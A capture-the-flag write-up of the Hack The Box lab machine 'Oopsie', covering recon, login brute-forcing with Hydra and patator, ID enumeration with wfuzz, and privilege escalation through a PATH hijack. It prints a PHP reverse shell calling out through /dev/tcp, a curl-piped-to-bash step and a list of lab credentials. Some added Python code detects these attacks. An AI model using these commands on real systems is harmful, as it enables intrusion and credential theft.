HTB Oopsie

Continuing the Intro boxes with my local infosec group, the second box on the list is Oopsie. It’s listed as an Easy box, but people starting out who aren’t familiar with web apps could get lost, especially when figuring out the initial login foothold. Its IP is 10.10.10.28, and you need the separate OpenVPN login pack to reach it; you can’t reach it with your normal one.

Recon

First we kick off an Nmap scan of all ports, then check the service versions and run the default scripts against the ports it found.

ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.28 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed 's/,$//')
nmap -sC -sV -p$ports 10.10.10.28

We find TCP ports 22 and 80 open:

22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxxctowbmnTyFHK0XREQShvlp32DNZ7TS9fp1pTxwt4urebfFSitu4cF2dgTlCyVI6o+bxVLuWvhbKqUNpl/9BCv/1DFEDmbbygvwwcONVx5BtcpO/4ubylZXmzWkC6neyGaQjmzVJFMeRTTUsNkcMgpkTJXSpcuNZTknnQu/SSUC5ZUNPdzgNkHcobGhHNoaJC2StrcFwvcg2ftx6b+wEap6jWbLId8UfJk0OFCHZWZI/SubDzjx3030ZCacC1Sb61/p4Cz9MvLL5qPYcEm8A14uU9pTUfDvhin1KAEEDCSCS3bnvtlw1V7SyF/tqtzPNsmdqG2wKXUb6PLyllU/L
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLaHbfbieD7gNSibdzPXBW7/NO05J48DoR4Riz65jUkMsMhI+m3mHjowOPQISgaB8VmT/kUggapZt/iksoOn2Ig=
|   256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKLh0LONi0YmlZbqc960WnEcjI1XJTP8Li2KiUt5pmkk
80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux

Since port 80 is open, we immediately start feroxbuster in another tab to look for web directories.

feroxbuster

feroxbuster --url http://10.10.10.28 --scan-limit 3 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt

We see a hit on http://10.10.10.28/cdn-cgi/login, and when we visit the page we see an HTTP login form.

Nikto

Another tool you can use for web scanning is Nikto, which runs a battery of tests against web servers. As you can see below, Nikto also found the /cdn-cgi/login/ directory.

Other tools

  • GoBuster
    • gobuster dir -u http://10.10.10.28 -w /usr/share/wordlists/dirb/common.txt -e
  • wfuzz
    • wfuzz -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.28/FUZZ --hc 404
  • ffuf
    • ffuf -u http://10.10.10.28/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -mc 200
  • dirb and dirbuster are also a good choice, especially dirbuster if you are more comfortable with a GUI tool.

Also, if we had had BurpSuite running we could have saved time: we would have seen a .js script being loaded whose path hints that the directory is there.

BurpSuite

Speaking of BurpSuite, you can attempt to brute-force login pages with it, but the Community edition throttles Intruder to slower speeds, which is a pain in the ass with huge wordlists. With Burp running, send the login request to Intruder, then in the Intruder->Positions tab mark the password field as the target.

Paste some passwords into the Intruder->Payloads tab, go back to Positions and start the attack.

You should see a successful result. For brevity we treat these boxes as one target company and reuse the password from the previous box, Archetype: MEGACORP_4dm1n!!

Hydra

For simple HTTP form POSTs another tool you can use is Hydra, the multi-protocol cracker included with Kali. We go through the same process to figure out the syntax needed to crack the password. Without Burp, you can open DevTools in Firefox and check the Network tab while attempting to log in, to see what kind of request was sent so we can reproduce it with Hydra.

Hydra can flag success or failure on a response code or an error string. Normally web login forms give feedback saying the user or password was bad, so instead of S=302 we could have used something like F=invalid (or whatever error text is shown). This login page shows no error, so we use the 302 HTTP response code as the success condition, since a valid login usually redirects you to the next page. The ^USER^ and ^PASS^ placeholders are filled from each line of the user and password files; since we can assume the username is admin we use the lowercase -l, and if we had a user list to cycle through we could have used -L users.txt. Since this is a simple HTTP POST form we use the http-post-form module along with the URL. Again, for brevity we used the password already known from the last box; otherwise a good wordlist may be used, but in real-world scenarios you could face lockouts or CAPTCHAs when brute-forcing logins, and you might trigger alerts to the web admin that someone is brute-forcing.

hydra -l admin -P passwords.txt 10.10.10.28 http-post-form "/cdn-cgi/login/index.php:username=^USER^&password=^PASS^:S=302"

patator

Patator is another multi-protocol cracker. We can do a similar crack and filter out the 200 HTTP responses, so we only see the 302 redirect of a valid login:

patator http_fuzz url=http://10.10.10.28/cdn-cgi/login/index.php method=POST body='username=admin&password=FILE0' 0=passwords.txt -x ignore:code=200

Super admin

Now that we are logged in and look around the links inside the panel, we notice the uploads page needs super admin rights. When users log in there is normally a cookie or a user ID associated with the session. So when we log into Oopsie and go to the uploads page, in the URL bar we see that our user id=1. We want to swap that number for a different one to see if we get associated with a different account ID that may have different privileges. Since Burp does well with adjusting and attacking parameters, we send this request to Intruder again.

In Burp you can set a sequential number payload to iterate from 1-50, so let’s try that and start the attack.

We can see from the results that number 30 has a different response size than most of the others.

Let’s mimic this with wfuzz. In bash we could create a wordlist containing the numbers 1 through 50:

printf '%s\n' {1..50} > numbers.txt

but there’s no need, as wfuzz includes a simple number iterator. We just need to supply the URL and the cookie of our admin user:

wfuzz -c -z range,1-50 -H 'Cookie: user=34322; role=admin' "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=FUZZ" 

As you can see, there are a lot of responses with the same length, 3595, so let’s filter those out using --hh 3595:

wfuzz -c -z range,1-50 -H 'Cookie: user=34322; role=admin' --hh 3595 "http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=FUZZ" 

That gives us fewer results to go through. We can then test each one with curl and grep for super; you will see there is an ID in the returned HTML. Let’s go into Firefox DevTools, change our user id number to 86575 and refresh the page. When we go to the uploads link we now have privileges to upload, so let’s go ahead and upload a simple PHP reverse shell.

curl -s --cookie-jar cookies.txt  -H $'Cookie: user=34322; role=admin' 'http://10.10.10.28/cdn-cgi/login/admin.php?content=accounts&id=30' |grep super
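As an added example (my code, not part of the original writeup), here is the defender’s side of the two techniques above: a small Python detector that reads Apache access-log lines and flags both the login brute-force pattern from the Hydra/patator section and the id= enumeration pattern from the wfuzz run. The log lines, client IPs, timestamps and thresholds are constructed; only the two URL paths are the ones from this page.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Apache "combined" access-log line (the scan found Apache 2.4.29 on port 80).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
                    r'(?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)')
LOGIN = "/cdn-cgi/login/index.php"      # the form Hydra/patator POST to
ACCOUNTS = "/cdn-cgi/login/admin.php"   # the page whose id= parameter wfuzz walked

def parse(lines):
    """Yield one dict per well-formed log line and silently skip anything else."""
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            yield m.groupdict()

def login_bruteforce(lines, threshold=8):
    """{ip: post_count} for clients that POST to the login form at least threshold times."""
    posts = defaultdict(int)
    for r in parse(lines):
        if r["method"] == "POST" and urlparse(r["path"]).path == LOGIN:
            posts[r["ip"]] += 1
    return {ip: n for ip, n in posts.items() if n >= threshold}

def id_enumeration(lines, threshold=5):
    """{ip: (distinct_ids, contiguous)} for clients that walk content=accounts&id=N;
    contiguous is True when the ids form an unbroken range (the range,1-50 signature)."""
    seen = defaultdict(set)
    for r in parse(lines):
        u = urlparse(r["path"])
        q = parse_qs(u.query)
        if u.path == ACCOUNTS and q.get("content") == ["accounts"] and q.get("id", [""])[0].isdigit():
            seen[r["ip"]].add(int(q["id"][0]))
    return {ip: (len(s), max(s) - min(s) + 1 == len(s))
            for ip, s in seen.items() if len(s) >= threshold}

# Constructed sample lines, not a capture from the box: nine failed POSTs, the 302 that
# marks a successful login, an id= sweep from the same client, and one ordinary request.
SAMPLE_LOG = [
    f'10.10.14.5 - - [24/Feb/2020:10:00:{s:02d} +0000] "POST {LOGIN} HTTP/1.1" '
    f'{200 if s < 9 else 302} 3595 "-" "curl/7.68.0"' for s in range(10)
] + [
    f'10.10.14.5 - - [24/Feb/2020:10:01:{s:02d} +0000] "GET {ACCOUNTS}?content=accounts&id={s + 1} '
    f'HTTP/1.1" 200 3595 "-" "curl/7.68.0"' for s in range(12)
] + ['10.10.14.9 - - [24/Feb/2020:10:02:00 +0000] "GET /cdn-cgi/login/admin.php?content=accounts&id=2 HTTP/1.1" 200 3595 "-" "Mozilla/5.0"']
```

On the constructed lines, login_bruteforce(SAMPLE_LOG) returns {'10.10.14.5': 10} and id_enumeration(SAMPLE_LOG) returns {'10.10.14.5': (12, True)}; the single request from 10.10.14.9 stays below both thresholds.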

Put this in a file named rev.php (use ifconfig tun0 to get your HTB VPN IP):

<?php exec("/bin/bash -c 'bash -i > /dev/tcp/10.10.15.93/9000 0>&1'");

Open a netcat listener on port 9000:

nc -lvnp 9000

When we upload our file we don’t get any feedback about where it was stored. Luckily, in our earlier recon we saw the /uploads directory, so let’s try navigating to http://10.10.10.28/uploads/rev.php. Lucky for us, the guess paid off; sometimes it’s difficult to know the upload directory, and sometimes even the filename gets randomized or hashed.

Now that we have our shell, let’s upgrade to a better TTY using python3:

python3 -c  'import pty; pty.spawn("/bin/bash")'

Looking around in the www directory we find a db.php file which holds some credentials 🙂 Let’s hope robert is lazy and reuses his password for SSH.

USER

We find that these are indeed robert’s SSH credentials too, so we grab user.txt.

Then we do some recon using linpeas to get some situational awareness. Let’s download linpeas and start a Python HTTP server to host it, then fetch it from the victim. From the attack box:

wget https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh && sudo python3 -m http.server 80

From the victim:

curl http://10.10.15.93/linpeas.sh | bash

We don’t find much useful information, although if you weren’t paying attention you might not have noticed the bugtracker group robert is in, so let’s figure out what he can do as a member of that group.

We see that robert can execute a binary in the bin folder called bugtracker. When we execute it, it asks for a number; I tried a few, then tried 1 and it finally returned some data. We run strings on the file to see if we can get any hints about what it’s doing:

strings /usr/bin/bugtracker

We see that it’s just using cat to read the contents of a file in the /root/report directory. Since it doesn’t use the full absolute path to cat, i.e. /bin/cat, we can create an evil cat in our home directory and put that directory at the front of PATH, so when bugtracker calls cat it finds ours first:

export PATH=~:$PATH
echo '/bin/bash' > cat
chmod +x cat
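As an added example (my code, not the bugtracker binary or anything from the original writeup), this Python shows why the PATH trick above works and what the fix looks like: resolve() walks PATH in the order execvp() does, hijack_risk() is an audit check that flags a bare command name that would run from outside the system bin directories, and read_report() is a hardened stand-in for the report lookup that validates the id and reads the file directly, so neither cat nor PATH is involved. The directories and report contents in demo() are constructed, and TRUSTED_DIRS is an assumption.

```python
import os
import tempfile
from pathlib import Path

TRUSTED_DIRS = ("/bin", "/usr/bin", "/sbin", "/usr/sbin")   # assumption: where cat should live

def resolve(cmd, path_env):
    """First executable named cmd along path_env, in the order execvp()/sh search it."""
    for d in path_env.split(os.pathsep):
        cand = os.path.join(d or ".", cmd)          # an empty PATH entry means the cwd
        if os.path.isfile(cand) and os.stat(cand).st_mode & 0o111:   # any execute bit set
            return os.path.realpath(cand)
    return None

def hijack_risk(cmd, path_env, trusted=TRUSTED_DIRS):
    """Path a bare cmd would actually run when it lies outside the trusted dirs, else None."""
    found = resolve(cmd, path_env)
    if found and not any(found.startswith(os.path.realpath(t) + os.sep) for t in trusted):
        return found
    return None

def read_report(report_dir, report_id):
    """Hardened stand-in for the lookup: strict id, direct read, no shell, no PATH involved.
    Returns None for any id it will not serve."""
    if not (report_id.isdigit() and len(report_id) <= 6):   # also rejects ../ and ;metachars
        return None
    base = Path(report_dir).resolve()
    target = (base / report_id).resolve()                   # follows symlinks before the check
    if target.parent != base or not target.is_file():
        return None
    return target.read_bytes().decode("utf-8", "replace")

def demo():
    """Constructed scenario, not the box: a planted cat in a home dir prepended to PATH."""
    with tempfile.TemporaryDirectory() as tmp:
        sysbin, home, reports = (os.path.join(tmp, d) for d in ("bin", "home", "reports"))
        for d in (sysbin, home, reports):
            os.mkdir(d)
        for d in (sysbin, home):                 # one legitimate cat, one planted cat
            Path(d, "cat").write_text("#!/bin/sh\n")
            Path(d, "cat").chmod(0o755)
        Path(reports, "1").write_text("constructed sample report 1\n")
        planted = os.path.realpath(os.path.join(home, "cat"))
        return {
            "clean": hijack_risk("cat", sysbin, trusted=(sysbin,)),                         # None
            "hijacked": hijack_risk("cat", home + os.pathsep + sysbin, trusted=(sysbin,)) == planted,
            "report": read_report(reports, "1"),
            "bad_ids": [read_report(reports, i) for i in ("../1", "1;id", "", "2")],       # all None
        }
```

demo() returns "clean": None with PATH pointing only at the system bin, "hijacked": True once the home directory is prepended (exactly the export PATH=~:$PATH above), and the hardened reader serves report 1 while refusing every malformed or missing id.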

ROOT

Well, it looks like we don’t have a root.txt yet :/ So, starting with more recon, let’s check out the /root folder.

Looking at the file, I noticed it looked like it had contents, so I figured I could use xxd to get the hex output of the file, and I found the flag :). Then came my aha moment: I wasn’t using the full path for cat either…

But… looking further in the root directory, we find a .config folder that has a filezilla.xml config with more credentials. Much like the last box, we’re probably going to use these credentials on the next box…

LOOT

  • admin:MEGACORP_4dm1n!!
  • robert:M3g4C0rpUs3r!
  • ftpuser:mc@F1l3ZilL4